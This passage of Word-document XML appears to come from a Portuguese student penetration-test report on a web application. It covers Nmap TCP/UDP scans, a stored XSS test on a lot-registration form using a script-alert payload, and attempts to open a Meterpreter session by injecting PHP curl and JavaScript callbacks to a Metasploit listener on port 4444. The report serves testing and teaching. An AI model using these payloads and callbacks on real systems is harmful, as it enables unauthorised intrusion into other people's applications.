        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; </w:t>
      </w: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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows microsoft-ds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Windows.</w:t>
      </w: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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache httpd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– Servidor Web.</w:t>
      </w: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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Microsoft Windows 98 netbios-ssn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311F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a comunicação de aplicativos locais.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B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087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt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F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="00311F6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ind w:left="2835" w:hanging="351"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087FBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ms-wbt-server</w:t>
      </w:r>
      <w:r w:rsidR="00311F69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11F69" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–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serviço de gerenciamento de hosts </w:t>
      </w:r>
      <w:r w:rsidR="00311F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do windows.</w:t>
      </w:r>
      <w:r w:rsidR="003F480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9317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>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="002D16A4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Usar o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan de portas UDP.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218D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Comando utilizado: nmap -sU -p 1-65535 IP_do_servidor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D16A4" w:rsidRDefault="00A13973" w:rsidP="00A218DE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141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“nmap” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">é utilizado </w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para executar a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00A218DE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“-sU” indica o uso do detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00A218DE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“-p” indicará quais </w:t>
      </w:r>
      <w:r w:rsidR="002D16A4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portas </w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">serão </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usa</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>das na varredura</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00A218DE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IP_do_servidor informa o IP onde está hospedada a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRDefault="002D16A4" w:rsidP="002D16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2D16A4" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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:rsidR="002D16A4" w:rsidRPr="00B15531" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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Espera</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-se descobrir as portas abertas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, os serviços</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que essas portas roda</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRPr="00311F69" w:rsidRDefault="002D16A4" w:rsidP="002D16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D16A4" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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  <w:highlight w:val="cyan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highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRPr="00F15F82" w:rsidRDefault="002D16A4" w:rsidP="00AB5BB3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De acordo com a figura </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">,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 xml:space="preserve">foi possível descobrir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">as portas abertas e </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRPr="00F15F82" w:rsidRDefault="0074275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F15F82" w:rsidRDefault="00EC5D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D256C2C" wp14:editId="1FB3C833">
            <wp:extent cx="5467350" cy="3654425"/>
            <wp:effectExtent l="0" t="0" r="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052A31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14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Portas UDP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A6607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F15F82" w:rsidRDefault="002D16A4" w:rsidP="002D16A4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Serviços e</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ncontrados na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>figura 14</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios-ns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NetBios [4]; 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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios -dgm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- serviço de datagrams do NetBios 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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snmp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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4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- protocolo windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00F15F82" w:rsidRDefault="00915C31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L2TP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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F15F8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(Protocolo de Encapsulamento de Camada 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="00630433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2D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat-t-like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- protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRDefault="00A66072" w:rsidP="002D16A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ind w:left="2835" w:hanging="351"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp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[3] - protoco</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lo de sincronização de relógios                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usando UDP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007649FC" w:rsidRPr="00F15F82" w:rsidRDefault="007649FC" w:rsidP="007649FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2835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F15F82" w:rsidRDefault="00EC5D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7649FC" w:rsidP="007649FC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4.3.3.2  XSS – Cadastro Lotes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23/04/16.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10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Descobrir se os camp</w:t>
      </w:r>
      <w:r w:rsidR="007649FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">os da tela de Cadastro Lotes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são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w: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7649F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Inserir em um dos campos o seguinte código:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B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&lt;script&gt; alert(“oi”);&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no campo Marca/Fabricante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="0049317F" w:rsidRPr="00F15F82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7649FC" w:rsidRPr="00F15F82" w:rsidRDefault="007649FC" w:rsidP="007649F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Caso a aplicação não realize um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados devem produzir um pop-up com o texto “oi”.</w:t>
      </w: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D46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6B" w:rsidP="007649F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49317F" w:rsidP="007649F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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que haja um tratamento e esse código não seja executado quando a página carregar.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649FC" w:rsidRDefault="005967D5" w:rsidP="007649F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7649F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6071F5" w:rsidRPr="00F15F82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Pr="00F15F82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8C6DC7" w:rsidRPr="00F15F82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057B33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conforme mostra a figura 15, f</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oi constatado que a aplicação não está fazendo o tratamento adequado para a </w:t>
      </w:r>
      <w:r w:rsidR="0049317F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inserção de códigos mal-</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRPr="00F15F82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C1742" w:rsidRPr="00F15F82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     </w:t>
      </w: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F141BE0" wp14:editId="517E47ED">
            <wp:extent cx="5400040" cy="3998595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057B33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15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Resultado teste XSS.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57B33" w:rsidRDefault="00057B3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11EF9" w:rsidRDefault="00211EF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C2CE7" w:rsidRDefault="00CC2CE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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00CC2CE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 partir da máquina virtual que usa o Kali Linux, abrir uma conexão do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fazendo uso de um listener da ferramenta Metasploit para acessar o sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
      <w:r w:rsidR="0049317F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CC2CE7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Passos utilizados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00CC2CE7">
      <w:p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1. Utilizar o Metasploit para abrir um listener na porta 444 da máquina virtual onde o Kali Linux está hospedado, usando o exploit disponível em Auxiliary/Multi/Handler;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00CC2CE7">
      <w:p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2. Usar um comando GET de Javascript para abrir a conexão da máquina que hospeda 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com a máquina virtual do Kali na porta indicada.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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00A40129" w:rsidP="00415B4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Comando a ser utilizado no XSS, o código abaixo tenta abrir uma conexão do tipo ‘GET’ com IP_do_servidor na porta 4444.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211EF9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>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9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>$curl = curl_init('http://IP_do_servidor:4444');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9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>curl_exec($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9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>curl_close($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9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?&gt;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415B47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Caso n</w:t>
      </w:r>
      <w:r w:rsidR="003E4BBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ão haja o devido tratamento, o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listener do Metasploit aberto na porta 444 deve criar uma conexão entre a máquina que </w:t>
      </w:r>
      <w:r w:rsidR="008A79EE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">acessa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a aplicação no momento e a máquina onde está o Kali Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E4BBF" w:rsidRDefault="003E4BB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E4BBF" w:rsidRPr="00F15F82" w:rsidRDefault="003E4BBF" w:rsidP="003E4BBF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3E4BBF" w:rsidRPr="00F15F82" w:rsidRDefault="003E4BBF" w:rsidP="003E4BBF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esperado é que os dados passados sejam devidamente tratados na aplicação para impedir a Sessão de teste.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3E4BBF" w:rsidRDefault="005967D5" w:rsidP="003E4BBF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3E4BBF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sessão do Meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="004D25DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, conceito abordado no subcapítulo 3.2</w:t>
      </w:r>
      <w:r w:rsidR="007A267D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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não foi aberta.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A267D" w:rsidRPr="00F15F82" w:rsidRDefault="007A267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3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7A267D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Alterar o comando utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A"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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2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para tentar descobrir o que impediu a sessão do Meterpreter ser aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A40129" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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F15F82" w:rsidRDefault="00A40129" w:rsidP="00415B4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</w:t>
      </w:r>
      <w:r w:rsidR="00D46C6B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ódigo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abaixo tenta abrir uma conexão com o IP_do_servidor na porta 4444 e caso haja u erro exibe o problema num pop-up.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415B4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>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B4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>$curl = curl_init('http://IP_do_servidor:4444');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B4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>if(!curl_exec($curl)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B4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00"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>javascript:alert(curl_error($curl));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B4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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B4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curl_close($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00415B47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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00415B47" w:rsidRDefault="00415B47" w:rsidP="00415B47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415B47" w:rsidRPr="00F15F82" w:rsidRDefault="00415B47" w:rsidP="00415B47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415B47" w:rsidRPr="00F15F82" w:rsidRDefault="00415B47" w:rsidP="00415B47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aplicação </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">deve </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zar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o tratamento para impedir o comando de ser executado.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415B47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8C6DC7" w:rsidP="00415B47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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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4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E2559" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00E31790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Ao contrário das demais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s que utilizavam códigos php, aqui foram utilizados códigos de Javascript puro, que os navegadores conseguem ler. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00537F7B" w:rsidP="00E3179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código abaixo cria um objeto do tipo XMLHttpReques</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t e tenta realizar uma chamada A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jax do tipo GET para</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidR="00881DA5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP_do</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00881DA5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>servidor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na porta 4444, de forma síncrona.</w:t>
      </w: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E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E3179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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
